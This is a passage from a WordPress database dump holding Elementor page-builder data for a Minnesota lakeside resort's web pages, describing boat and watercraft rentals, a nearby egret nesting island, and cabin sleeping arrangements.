BOAT<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eefc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9de916f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f334c4c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"75e0743\"}]},\"elements\":[{\"id\":\"991c5f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3841.jpg\",\"id\":497}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"340682a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LAUNCH ON SITE $10.00 ONE TIME CHARGE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99b8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"11b94d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"da4d017\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"abd79ac\"}]},\"elements\":[{\"id\":\"795afe3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC04860.jpg\",\"id\":348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"11200cf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE CANOE AND KAYAK USE TO ALL GUESTS<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36e1853\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"cbc097a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6c8184f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2ed5a11\"}]},\"elements\":[{\"id\":\"c1238f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a28b037\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"63eca3b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"13e791a\"}]},\"elements\":[{\"id\":\"a7630d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3828.jpg\",\"id\":552}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"017271e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE USE OF PADDLE BOARDS FOR GUESTS<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fb16710\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1ccf64d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ce0da8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db765d1\"}]},\"elements\":[{\"id\":\"c08c13b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSC0342.jpg\",\"id\":550}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"887e12c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LIFT RENTAL<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ad760a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"71b87fc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c7ff68d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d88c0cd\"}]},\"elements\":[{\"id\":\"e02420b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN3462.jpg\",\"id\":551}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"87a5746\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">PLENTY OF BOAT SLIPS AVAILABLE<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89ddcdd\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"4802a00\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"94bd481\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d562f41\"}]},\"elements\":[{\"id\":\"bd63f53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"65bbf44\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c90a3a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d726c85\"}]},\"elements\":[{\"id\":\"c4fdd4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>You can rent our 20\' pontoon or a 14 foot Lund with 15 hp motor for a day or week and enjoy fishing all the coves and bays that Pelican Lake has to offer. There is no charge for the use of the kayaks, paddle boards, canoes or paddle boat<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2763,878,'_elementor_version','2.5.16'),(2767,879,'_wp_page_template','default'),(2768,879,'_elementor_edit_mode','builder'),(2769,879,'_elementor_template_type','post'),(2770,879,'_elementor_version','2.5.12'),(2771,879,'_elementor_data','[{\"id\":\"4e75edc\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"75e0b17\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"190ff24\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e7f7f11\"}]},\"elements\":[{\"id\":\"d12d45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e166c4f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"825f625\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4ecd425\"}]},\"elements\":[{\"id\":\"bcb8ee8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>EGRET ISLAND SCIENTIFIC AND NATURAL AREA<\\/strong><br \\/>A 34 acre island on Pelican Lake with an egret\\/ heron, one of the largest in Minnesota to protect nesting Herons, Egrets and Cormorants.<br \\/><strong>BEST TIMES TO VISIT<\\/strong>: May through July<br \\/><strong>BIRDS TO LOOK FOR:<\\/strong> Great Blue Heron, Great Egret, Black crowned Night Heron, Bald Eagles and many varieties of waterfowl.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"652a9c0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"941a68a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"db1cd2c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"77f2fe7\"}]},\"elements\":[{\"id\":\"907b353\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dff2d5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"13e12df\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"79f88fc\"}]},\"elements\":[{\"id\":\"78339db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0111cropped.jpg\",\"id\":334},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"24a8461\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"277c649\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2776fcf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e46a15c\"}]},\"elements\":[{\"id\":\"35a87df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0528.jpg\",\"id\":337},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"416845e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f6c85c6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e9eb61f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2f7e666\"}]},\"elements\":[{\"id\":\"877051d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0428.jpg\",\"id\":485}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2afc1af\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"82265b8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61556d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"879b52c\"}]},\"elements\":[{\"id\":\"183922b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"159b541\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c0cb14\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"502233b\"}]},\"elements\":[{\"id\":\"e65066b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.12.40-PM.png\",\"id\":773}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6484ac8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5b682d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6278ced\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f10a619\"}]},\"elements\":[{\"id\":\"3611c11\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3645.jpg\",\"id\":357},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3512ca9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"85d8902\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"29fbccb\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6cd8a18\"}]},\"elements\":[{\"id\":\"a981a86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3607.jpg\",\"id\":356},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a786f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a58d1af\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ffc419\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"631f271\"}]},\"elements\":[{\"id\":\"61eb0cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c4c154c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9ad33c4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"92a65b9\"}]},\"elements\":[{\"id\":\"6e7ea21\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3381.jpg\",\"id\":352},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"210e62a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c9955f8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6af7ce6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"dd4630f\"}]},\"elements\":[{\"id\":\"ea948a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0971.jpg\",\"id\":338}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddf3233\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bab1281\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ff057f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"260fb0c\"}]},\"elements\":[{\"id\":\"f85d395\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2428.jpg\",\"id\":185},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df56761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5f9df41\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d7d61cf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"616f81d\"}]},\"elements\":[{\"id\":\"d447070\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73a82be\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1d284f6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"95bad3f\"}]},\"elements\":[{\"id\":\"0b1fe5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2438.jpg\",\"id\":186},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8ff0a4c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9282b83\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9946c13\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2df9de4\"}]},\"elements\":[{\"id\":\"efd238a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0273.jpg\",\"id\":484}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5b28a00\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"aa717c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a627f24\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f55fc3f\"}]},\"elements\":[{\"id\":\"33c1da6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3449.jpg\",\"id\":487},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c310c4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dc27ce8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"52c6b37\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2bc1f34\"}]},\"elements\":[{\"id\":\"136d8d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f17526a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c1f4961\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1de3965\"}]},\"elements\":[{\"id\":\"953ca0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.18.18-PM.png\",\"id\":774}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8665d90\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0c9f6ba\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"657872e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"cccb494\"}]},\"elements\":[{\"id\":\"2c32f51\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3325.jpg\",\"id\":486},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9f8ffe1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"206e371\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aaed728\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"302f717\"}]},\"elements\":[{\"id\":\"bcb10d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.19.24-PM.png\",\"id\":775}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2776,883,'_elementor_edit_mode','builder'),(2777,883,'_elementor_template_type','post'),(2778,883,'_elementor_version','2.5.16'),(2779,883,'_wp_page_template','default'),(2780,883,'_elementor_data','[{\"id\":\"f523c97\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5afd9c7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"79c352d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4cd61c\"}]},\"elements\":[{\"id\":\"c7622c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"013e706\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2a9bf7b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4aff54c\"}]},\"elements\":[{\"id\":\"31f7a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>I have a few weeks I am going to split up into 3 and 4 night stays. Weeks include the last week of July and all of August.\\u00a0 Call for details !!!<\\/h2><p>\\u00a0<\\/p><p><strong>Love to stay at a Cabin - <span style=\\\"text-decoration: underline;\\\"><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/span><\\/strong><\\/p><p>Cabins are available weekly only\\u00a0 (Saturday to Saturday) during June and July. There are a few weeks still available for 2019.<\\/p><p><strong>Our motel and cabins are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets. <a href=\\\"http:\\/\\/ashbyresort.com\\/campground-map\\/\\\">(see map)<\\/a><\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a763503\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3f28486\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"76a9305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ec644e\"}]},\"elements\":[{\"id\":\"c20b05e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d36d555\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b3d4418\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bc32c7b\"}]},\"elements\":[{\"id\":\"44df606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 10\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25a558f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-001.jpg\",\"id\":286}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5430be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom , 1 bath<\\/strong><\\/p><p><strong>2\\u00a0queen beds, 1 double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"666a77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3c6e3e6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3cf59d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"69505cd\"}]},\"elements\":[{\"id\":\"ec73946\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 11\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c5f5023\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/cabin11.jpg\",\"id\":282}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a9b3aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-1-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"6\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom, 1 bath<\\/strong><\\/p><p><strong>\\u00a02 queen\\u00a0beds, 1\\u00a0double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dcd2c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1b9636\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"68cf5dc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6008bdd\"}]},\"elements\":[{\"id\":\"6a1d473\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 12\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c8e6a42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/Carly-008.jpg\",\"id\":119}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fe9f77\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-2-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"10\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>Remodeled in 2016\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0\\u00a0 2 bedroom 1 bath<\\/strong><\\/p><p><strong>\\u00a01 queen\\u00a0bed, 2 twin beds, 1 hide-a-bed,<\\/strong><\\/p><p><strong>Sleeps 6<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f280b90\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"394f183\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"418f6db\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ee7fbf2\"}]},\"elements\":[{\"id\":\"6bffb12\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a389722\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dc479f1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"9bad41c\"}]},\"elements\":[{\"id\":\"66464a3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.01-PM.png\",\"id\":781}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"aaa14b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full 